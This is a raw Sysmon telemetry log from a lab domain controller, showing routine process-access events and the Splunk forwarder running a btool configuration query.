Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4B00-000000009101}3984C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8552-5FCF-4A00-000000009101}39723976C:\Windows\system32\cmd.exe{10ACEC4A-8552-5FCF-4B00-000000009101}3984C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.515{10ACEC4A-8552-5FCF-4B00-000000009101}3984C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.508{10ACEC4A-8552-5FCF-4300-000000009101}28522816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.510{10ACEC4A-8552-5FCF-4A00-000000009101}3972C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.492{10ACEC4A-8541-5FCF-1000-000000009101}11562392C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wmiprvsd.dll+fa1f|C:\Windows\system32\wbem\wmiprvsd.dll+1351d|C:\Windows\system32\wbem\wmiprvsd.dll+127f4|C:\Windows\system32\wbem\wbemcore.dll+ced2|C:\Windows\system32\wbem\wbemcore.dll+d531|C:\Windows\system32\wbem\wbemcore.dll+104fe|C:\Windows\system32\wbem\wbemcore.dll+25435|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 